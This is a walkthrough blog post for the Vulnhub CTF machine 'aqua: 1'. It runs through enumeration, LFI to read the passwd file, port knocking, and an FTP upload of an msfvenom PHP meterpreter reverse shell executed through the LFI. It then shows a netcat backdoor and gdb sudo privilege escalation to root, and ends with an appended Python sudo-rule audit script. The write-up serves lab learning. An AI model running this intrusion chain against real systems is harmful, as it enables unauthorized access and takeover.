aqua: 1 walkthrough Vulnhub CTF


Today we are solving another Vulnhub CTF: aqua: 1, created by yunaranyanca. This CTF is hosted on the Vulnhub server; you can download it here.

First, we scan our local network to find the target IP.

Nmap aggressive port scanning

nmap -A

While scanning with dirb we found many URLs. I used the .php extension filter, so the output only shows URLs with the .php extension.

dirb -X .php /usr/share/wordlists/dirb/big.txt

When I open the target IP in our browser, we find this page.

When clicking the “Sure, I’ll help” button, we are redirected to another page which shows credentials.

During the dirb scan we found another URL, login.php. I opened the URL and saw a login page. I tried to log in with this credential: vashivmegmin, and we were successfully logged in.

This URL is vulnerable to LFI (local file inclusion); we can see the target system's passwd file.

I tried to log in to FTP but got a connection timed out message. After deeper enumeration, I found that a port-knocking firewall is implemented on this server.

Port knocking
knock 1234 5678 9012

Log in with FTP again

  • username: megumin
  • password: watashiwamegumin

With the dir command we see all the files in our current directory and their permissions.

Creating a msfvenom PHP reverse shell payload

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4545 -f raw >/tmp/shell.php

After creating the payload, log in again with FTP using the same username and password. We already saw the directory permissions (757 means the root user has full permissions, other users have the same permissions, and only the group is limited to read and execute).

cd production

This time we upload our shell to the web directory

put shell.php

We see our shell was uploaded successfully. Now we execute our shell through the LFI (Local File Inclusion) vulnerability.

I had already started msfconsole, and I got a reverse shell on the target machine.


use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4545
run

Now I run the shell command and get a blank shell, so this time we spawn a bash shell through the Python pty module.

python3 -c 'import pty;pty.spawn("/bin/bash")'

The current user is www-data and has very limited permissions.


With the id command we see that our current shell user is www-data. We already have the megumin user's password, so I run the su (switch user) command with megumin and the user's password, and our shell changes from www-data to megumin.

su megumin

Let's check the sudoers entries with sudo -l

sudo -l

We see a backdoor script in the sudoers entries. I open the script with the cat command and we see a bash script that automatically opens a netcat connection. I run the command with sudo and the backdoor is opened.

cat /home/aqua/Desktop/backdoor
sudo /home/aqua/Desktop/backdoor

Connecting to backdoor

nc 1337

Again we use the Python pty module to spawn a shell

python -c 'import pty;pty.spawn("/bin/bash")'

I run the id command and we see that our user has changed to the aqua user. I run sudo -l again and find many scripts, but I try the gdb privilege escalation.

sudo -l

Privilege Escalation

GDB privilege escalation; for more about gdb see here

sudo gdb -nx -ex '!bash' -ex quit
cd /root


Reading our last root flag

cat root.txt
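
Both privilege jumps above relied on sudo rules: a script under another user's home directory and gdb, which can run shell commands. The following is an added example, not part of the original write-up: a Python check that reviews `sudo -l` output for such rules. The sample output, the /usr/bin/gdb path, the short list of shell-escape binaries and the trusted directory list are assumptions constructed for illustration.

```python
import os
import re

# Binaries that can run shell commands from inside (short, non-exhaustive list; assumption).
SHELL_ESCAPE = {"gdb", "vi", "vim", "less", "more", "man", "find", "awk",
                "python", "python3", "perl"}
# Directories assumed to be writable only by root on a standard Linux install.
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                "/usr/local/bin/", "/usr/local/sbin/")
# One rule line of `sudo -l` output, e.g. "(ALL) NOPASSWD: /usr/bin/gdb".
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample, modelled on the rules described in the walkthrough.
SAMPLE = """\
User aqua may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/gdb
    (ALL) NOPASSWD: /home/aqua/Desktop/backdoor
    (root) NOPASSWD: /usr/sbin/service apache2 restart
"""

def audit_sudo_rules(sudo_l_output):
    """Return (command, reason) findings for sudo rules that deserve review."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults and blank lines are skipped
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            path = cmd.split()[0]
            if path == "ALL":
                findings.append((cmd, "unrestricted sudo"))
            elif os.path.basename(path) in SHELL_ESCAPE:
                findings.append((cmd, "binary allows shell escape"))
            elif not path.startswith(TRUSTED_DIRS):
                findings.append((cmd, "path outside root-owned system directories"))
    return findings

if __name__ == "__main__":
    for cmd, reason in audit_sudo_rules(SAMPLE):
        print(f"{cmd}: {reason}")
```

Rules flagged this way are candidates for removal or for replacement with a root-owned wrapper that takes no user-controlled input.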

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
